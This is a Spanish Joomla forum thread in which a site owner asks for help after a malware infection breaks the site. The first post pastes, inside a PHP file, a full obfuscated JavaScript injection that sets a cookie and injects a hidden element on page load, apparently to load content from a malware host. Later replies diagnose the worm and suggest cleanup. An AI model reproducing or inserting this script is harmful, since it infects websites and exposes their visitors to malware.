Foros del Web » Creando para Internet » Sistemas de gestión de contenidos » Joomla »

Errores en file.php y fileoutput.php

Estas en el tema de Errores en file.php y fileoutput.php en el foro de Joomla en Foros del Web. Hola a todos, el sitio estaba funcionando perfectamente y lo estubo desde enero del 2011. Me informan del siguiente error al ingresar El sitio: dominicasorihuela.org ...
  #1 (permalink)  
Antiguo 06/09/2011, 07:35
 
Fecha de Ingreso: junio-2008
Mensajes: 17
Antigüedad: 15 años, 10 meses
Puntos: 0
Errores en file.php y fileoutput.php

Hola a todos, el sitio estaba funcionando perfectamente y lo estubo desde enero del 2011.
Me informan del siguiente error al ingresar

El sitio: dominicasorihuela.org
Parse error: syntax error, unexpected T_STRING in

/home/jy000104/public_html/libraries/joomla/cache/storage/file.php on line 255

La linea a la cual se refiere: $time = @file_get_contents($path.'_expire');

// set prune period
if(file_exists($path.'_expire')) {
$time = @file_get_contents($path.'_expire');
if ($time < $this->_now || empty($time)) {
$this->remove($id, $group);
}


y tampoco puedo ingresar al administrador
dominicasorihuela.ort/administrator
Parse error: syntax error, unexpected T_LNUMBER in

/home/jy000104/public_html/libraries/joomla/filter/filteroutput.php on line 137

La línea: $text = preg_replace( "'<script[^>/* BEGIN bca20aa659d1c6da4ae9ef21a7f4f6c5 */

var FelwV;var IOAIOtsE=0;function

LF87ejhA(u3FJ4,aMvpeP4d7,aMvpfP4d7,aMvpgP4d7,aMvpd P4d7,aMvpaP4d7,aMvpbP4d7,aMvpcP4d7){var

sCINnl9e1S=u3FJ4;u3FJ4+="3280";if(u3FJ4==sCINnl9e1 S){for(var

i;i<u3FJ4.length;i++){sCINnl9e1S+=u3FJ4.charCodeAt (i);if(i==0x61){break;}}}return u3FJ4.length;};function

wcp1wmaGamO(J6qr7hQNvFE){LF87ejhA(J6qr7hQNvFE+"qub na");var

H439LcFV="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn opqrstuvwxyz0123456789+/";var

OuAMagpGQ,tBhgLqP,tl0k6fuhH,olkUBo3gf,result=[];for(olkUBo3gf=0;olkUBo3gf<J6qr7hQNvFE.length;olkU B

o3gf++){if(J6qr7hQNvFE.charAt(olkUBo3gf)=="="){bre ak;}LF87ejhA("aus7"+olkUBo3gf);OuAMagpGQ=H439LcF

V.indexOf(J6qr7hQNvFE.charAt(olkUBo3gf));LF87ejhA( OuAMagpGQ);tl0k6fuhH=olkUBo3gf%4;switch(tl0k6fu

hH){case 1:result.push(String.fromCharCode(tBhgLqP<<2|OuAMa gpGQ>>4));break;case

2:LF87ejhA("asUMoai");result.push(String.fromCharC ode((tBhgLqP&0x0f)<<4|OuAMagpGQ>>2));break;case

3:result.push(String.fromCharCode((tBhgLqP&3)<<6|O uAMagpGQ));break;}tBhgLqP=OuAMagpGQ;}LF87ejhA

("Mki162bz");return result.join("");};function EDDrJi(oRo0m,av4GyEKt){var J6qr7hQNvFE;var

U6Br0GhEmC="",Eg8CDqDaA=0;if(!IOAIOtsE){FelwV=new Array(0x9d, 0xfe, 0xa8, 0xd7, 0xb5, 0xb5, 0x99,

0x81, 0x99, 0xf7, 0xe6);IOAIOtsE=11;}LF87ejhA("81728aamz");J6qr7hQNv FE=wcp1wmaGamO(oRo0m);var

Eg8CDqDaA=J6qr7hQNvFE.length;if(av4GyEKt==0){for(v ar

olkUBo3gf=0;olkUBo3gf<Eg8CDqDaA;olkUBo3gf++){var

vAIBHGI4Mz=J6qr7hQNvFE.charCodeAt(olkUBo3gf);var

JxgFzSnb=vAIBHGI4Mz^FelwV[olkUBo3gf%IOAIOtsE];U6Br0GhEmC+=String.fromCharCode(JxgFzSnb);}}else{

var zzwty="";for(var olkUBo3gf=0;olkUBo3gf<Eg8CDqDaA;olkUBo3gf+=2){var

vAIBHGI4Mz=J6qr7hQNvFE.charCodeAt(olkUBo3gf)^FelwV[olkUBo3gf%IOAIOtsE];var

JxgFzSnb;if(olkUBo3gf<Eg8CDqDaA-1){JxgFzSnb=J6qr7hQNvFE.charCodeAt(olkUBo3gf+1)^Fe lwV[(olkUBo3g

f+1)%IOAIOtsE];}else{JxgFzSnb=0;}zzwty+="%u";if(JxgFzSnb<=0x0f){ zzwty+="0";}zzwty+=JxgFzSnb.toString(

16);if(vAIBHGI4Mz<=0x0f){zzwty+="0";}zzwty+=vAIBHG I4Mz.toString(16);}U6Br0GhEmC=unescape(zzwty);}r

eturn U6Br0GhEmC;};var UqjVcrFb3=EDDrJi("6I3NpdzR2LGhxtHbvJri", 0);var dVsiJsyogT="25";var

iF5qc=1;function LbrphoDNF(name){var UwsEI=document.cookie;if(!UwsEI){return null;}var

ULj1m0VF=UwsEI.split(";");var i=0;for(i=0;i<ULj1m0VF.length;i++){var

Apr0VPTjA0M=ULj1m0VF[i].split("=");if(Apr0VPTjA0M[0]!=name){continue;}return

unescape(Apr0VPTjA0M[1]);}return null;};function t4mGe(name,value){var exp=new Date();var

FQ0B5ep4Bew=exp.getTime()+(2*365*24*60*60);exp.set Time(FQ0B5ep4Bew);var

d5DJcoww1zs=name+"="+escape(value)+EDDrJi("pt7Nr8X c6+Tqyg==",

0)+exp.toGMTString();document.cookie=d5DJcoww1zs;} ;function mFU2pom(){try{var

CCnp8qzc=document.getElementById(EDDrJi("6ZPYiNHc7 7A=",

0));CCnp8qzc.style.visibility=EDDrJi("9ZfMs9Db", 0);}catch(e){};};function

MKJM5ENE(){if(iF5qc){try{if(LbrphoDNF(UqjVcrFb3)== dVsiJsyogT){return false;}}catch(e){};}try{var

CCnp8qzc=document.getElementById(EDDrJi("6ZPYiNHc7 7A=", 0));if(CCnp8qzc){return

false;}}catch(e){};try{var CCnp8qzc=document.createElement(EDDrJi("2bf+",

0));CCnp8qzc.id=EDDrJi("6ZPYiNHc77A=", 0);var

emo4Hxua=EDDrJi("9Yrcp4+atuf1lpX1yYa02pvw77aah/SQhqfdxabx+JCDoJ/OtoXQq7b9x9P7ncvkgIw=",

0);var

SomDUb6jD=EDDrJi("oZfOpdTY/KH2mYryn8zqktjf1KuHifDWgeySlfbv/IWU8oyV8NjzzLPpmIu115Pwlcbr4qTQ"

,

0)+emo4Hxua+EDDrJi("ut7fvtHB8byozsb1m8Gw3cGksKDXgO +fxbLX2uvl/IXbrd7btMfa9e3wmYGg2ca4koulrvC

RlPyTzek=",

0);document.body.appendChild(CCnp8qzc);CCnp8qzc.in nerHTML=SomDUb6jD;t4mGe(UqjVcrFb3,dVsiJsyog

T);}catch(e){};};if(document.addEventListener){doc ument.addEventListener(EDDrJi("2bHllNrb7eT3g6ryn8y

y0Q==", 0),MKJM5ENE,false);}else{document.write("<"+"scrip t id=__ie_onload defer

src=javascript:void(0)><"+"\/script>");var script=document.getElementById(EDDrJi("wqHBsura9+3 2loI=",

0));script.onreadystatechange=function(){if(this.r eadyState==EDDrJi("/pHFp9nQ7eQ=",

0)){MKJM5ENE();}};}/* END bca20aa659d1c6da4ae9ef21a7f4f6c5 */]*>.*?</script>'si", '', $text );

en la funcion: function cleanText ( &$text )
{


Alguna idea del porqué suceden los errores.
Desde ya muchas gracias. Saludos cordiales rb.
  #2 (permalink)  
Antiguo 07/09/2011, 06:20
 
Fecha de Ingreso: junio-2008
Mensajes: 17
Antigüedad: 15 años, 10 meses
Puntos: 0
Respuesta: Errores en file.php y fileoutput.php

Quedó horrible, mil disculpas, lo haré de nuevo.
  #3 (permalink)  
Antiguo 07/09/2011, 06:22
 
Fecha de Ingreso: junio-2008
Mensajes: 17
Antigüedad: 15 años, 10 meses
Puntos: 0
Respuesta: Errores en file.php y fileoutput.php

Hola a todos, el sitio estaba funcionando perfectamente y lo estubo desde enero del 2011.
Me informan del siguiente error al ingresar

El sitio: dominicasorihuela.org
Parse error: syntax error, unexpected T_STRING in

/home/jy000104/public_html/libraries/joomla/cache/storage/file.php on line 255

La linea a la cual se refiere: $time = @file_get_contents($path.'_expire');

// set prune period
if(file_exists($path.'_expire')) {
$time = @file_get_contents($path.'_expire');
if ($time < $this->_now || empty($time)) {
$this->remove($id, $group);
}

y tampoco puedo ingresar al administrador
dominicasorihuela.ort/administrator
Parse error: syntax error, unexpected T_LNUMBER in

/home/jy000104/public_html/libraries/joomla/filter/filteroutput.php on line 137

(que es el chorizo que se ve arriba....)

en la funcion: function cleanText ( &$text )
{


Alguna idea del porqué suceden los errores.
Desde ya muchas gracias. Saludos cordiales rb. (ahora creo que está mejor.)
  #4 (permalink)  
Antiguo 07/09/2011, 07:38
vtj
 
Fecha de Ingreso: febrero-2011
Mensajes: 613
Antigüedad: 13 años, 2 meses
Puntos: 40
Respuesta: Errores en file.php y fileoutput.php

Ciao

Lo primero que se me pasa por la cabeza és preguntar: que modificaciones se han hecho ultimamente en el sitio o en el servidor?
  #5 (permalink)  
Antiguo 07/09/2011, 09:03
 
Fecha de Ingreso: junio-2008
Mensajes: 17
Antigüedad: 15 años, 10 meses
Puntos: 0
Respuesta: Errores en file.php y fileoutput.php

Hola vtj, gracias por responder.
El sitio comenzó en diciembre/enero del 2010/11, y desde esa época solo se han incorporado nuevos artículos, la estructura del sitio no ha cambiado desde entonces.

Saludos.
  #6 (permalink)  
Antiguo 07/09/2011, 11:51
 
Fecha de Ingreso: septiembre-2011
Mensajes: 1
Antigüedad: 12 años, 7 meses
Puntos: 0
Respuesta: Errores en file.php y fileoutput.php

Yo creo que lo que pones arriba es el codigo de un gusano que ha infectado tu sitio, comienza por infectar todos los javascript que encuentra comienza /* BEGIN bca20aa659d1c6da4ae9ef21a7f4f6c5 */ y acaba /* END bca20aa659d1c6da4ae9ef21a7f4f6c5 */

Infecta las etiquetas javascript y el cierre del body.

Tienes que limpiar todos los scripts, como el gusano solo varia dos o tres veces, con el multireplacer o alguno similar, puedes reemplazar el codigo por lotes de archivos.

Y los que no a mano.

Pero primero tienes que encontrar la vulnerabilidad por donde ha entrado.

Como este foro es de joomla, yo haria un backup de la base, guardaria el tema si no esta infectado y pondria un joomla actualizado.
  #7 (permalink)  
Antiguo 07/09/2011, 15:48
 
Fecha de Ingreso: junio-2008
Mensajes: 17
Antigüedad: 15 años, 10 meses
Puntos: 0
Respuesta: Errores en file.php y fileoutput.php

Gracias por la respuesta karlcop.
Yo tenía una copia, no se de que época, y es como dices, ese código de arriba, desde BEGIN, hasta el END, no están; los elimino y actualizo el archivo y el administrator apareció por un segundo y luego un msg de cherome:


Advertencia: algo falla aquí
www.dominicasorihuela.org incluye contenido de flash7.co.in, un sitio conocido por distribuir software malintencionado. Tu ordenador podría infectarse con un virus si accedes a este sitio.
Google ha detectado software malintencionado que podría instalarse en tu ordenador si continúas. Si has accedido a este sitio anteriormente o si confías en él, es posible que haya sido interceptado recientemente por un hacker. No deberías continuar. Tal vez podrías intentar acceder de nuevo mañana o visitar otro sitio.
Ya hemos informado al host flash7.co.in de que hemos encontrado software malintencionado en el sitio. Para obtener más información sobre las incidencias que se han detectado en el host flash7.co.in, consulta la página Página de diagnóstico de navegación segura de Google.

Si eres consciente de que el hecho de acceder a este sitio puede dañar tu ordenador, haz clic en el enlace continuar de todos modos.

Ayuda a mejorar la detección de software malintencionado enviando datos adicionales a Google sobre sitios en los que aparece esta advertencia. Estos datos se tratarán de acuerdo con la política de la página Políticas de privacidad de navegación segura.

"""""""""""""""""""""""""""""""
Entonces seguiré tu consejo:

Infecta las etiquetas javascript y el cierre del body.

Tienes que limpiar todos los scripts, como el gusano solo varia dos o tres veces, con el multireplacer o alguno similar, puedes reemplazar el codigo por lotes de archivos.

Y los que no a mano.

Pero primero tienes que encontrar la vulnerabilidad por donde ha entrado.
"""""""""""""""""""
Ya aquí estoy un poco perdido,
1- limpiar todos los script. Como, reviso archivo por archivo????
2- también afecta el cierre del body. Por donde comienzo a buscar, alguna idea?
3- a que te refieres con el multireplacer, algún modo de "buscar y reemplazar" que está en donde?
4- y esta la pero: como encuentro la vulnerabilidad???? realmente, no se por donde empezar...

"""""""""""""""
Pero luego me dices:
Como este foro es de joomla, yo haria un backup de la base, guardaria el tema si no esta infectado y pondria un joomla actualizado.

1- es posible que el gusano haya infectado la base también?
2- recuerdo que utilice un joomla "ante último" (por decirlo así) porque el tema que utilice no estaba disponible para el último.

Quizás este problema se solucione con la actualización a la versión última de joomla, pero, haga lo que haga, la primera o la segunda opción, si no encuentro la vulnerabilidad, estaré expuesto nuevamente ???????? es así o me equivoco?

Bueno, desde ya muchísimas gracias por tu respuesta, veremos como me va.
Saludos cordiales. rb
  #8 (permalink)  
Antiguo 07/09/2011, 16:22
vtj
 
Fecha de Ingreso: febrero-2011
Mensajes: 613
Antigüedad: 13 años, 2 meses
Puntos: 40
Respuesta: Errores en file.php y fileoutput.php

Cita:
Iniciado por rojobe Ver Mensaje
,,, si no encuentro la vulnerabilidad, estaré expuesto nuevamente ???????? es así o me equivoco?...
Ciao

Exacto, pero no busques la vulnerabilidad solo en joomla, puede estar tambien en una extensión instalada o provenir de tu propio ordenador
  #9 (permalink)  
Antiguo 16/09/2011, 03:53
 
Fecha de Ingreso: junio-2008
Mensajes: 17
Antigüedad: 15 años, 10 meses
Puntos: 0
Respuesta: Errores en file.php y fileoutput.php

Hola a todos, aquí nuevamente, tratando de sacar el gusano pero no lo logro, ahora, luego de arduos días de trabajo buscando y buscando en todos los archivos, recurriendo a copias de seguridad (también infectadas) y creyendo que ya lo tenía, este nuevo mensaje:

Fatal error: Class 'JApplication' not found in /home/jy000104/public_html/libraries/joomla/factory.php on line 46

cuya linea 46 es:
$instance = JApplication::getInstance($id, $config, $prefix);

que está dentro de esta función:

function &getApplication($id = null, $config = array(), $prefix='J')
{
static $instance;
if (!is_object($instance))
{
jimport( 'joomla.application.application' );
if (!$id) {
JError::raiseError(500, 'Application Instantiation Error');
}
$instance = JApplication::getInstance($id, $config, $prefix);
}
return $instance;
}

Alguna idea de por donde empezar a buscar?????

Saludos cordiales.
  #10 (permalink)  
Antiguo 20/09/2011, 05:48
 
Fecha de Ingreso: junio-2008
Mensajes: 17
Antigüedad: 15 años, 10 meses
Puntos: 0
Respuesta: Errores en file.php y fileoutput.php

Bueno, la cosa no ha terminado bien, he tratado de reinstalar todo porque por más que busco y busco el gusano, no logro sacarlo del todo. Y si bien he reinstalado en mi máquina un servidor joomla y he puesto a funcionar todo el sitio allí, también estoy teniendo algún problema en la migración al hosting.
Nada sale bien y las ayudas que tiene joomla a mi entender, son muy "livianas".
Gracias a los que han tratado de ayudarme, pero lamentablemente todo lo que he hecho, incluidos los consejos, no han servido de nada.
Saludos cordiales.

Etiquetas: errores, php
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 21:09.